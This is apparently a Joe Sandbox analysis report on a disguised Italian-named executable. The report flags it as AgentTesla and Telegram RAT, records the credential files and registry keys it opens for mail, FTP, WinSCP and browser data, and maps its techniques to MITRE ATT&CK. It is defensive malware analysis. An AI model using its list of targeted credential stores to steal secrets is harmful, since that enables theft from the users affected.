Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Queries volume information: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Queries volume information: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 11_2_05F84EF4 GetUserNameW,

11_2_05F84EF4

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 11.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.561107496.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.691821194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.566316771.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.561644091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.560802331.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Controllo saldo 30% Ordine 5667.exe PID: 6876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match	File source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 11.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.561107496.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.691821194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.566316771.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.561644091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.560802331.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Controllo saldo 30% Ordine 5667.exe PID: 6876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	211 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	1 Account Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	114 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	11 Encrypted Channel	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	211 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	4 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	211 Process Injection	DCSync	131 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Controllo saldo 30% Ordine 5667.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Controllo saldo 30% Ordine 5667.exe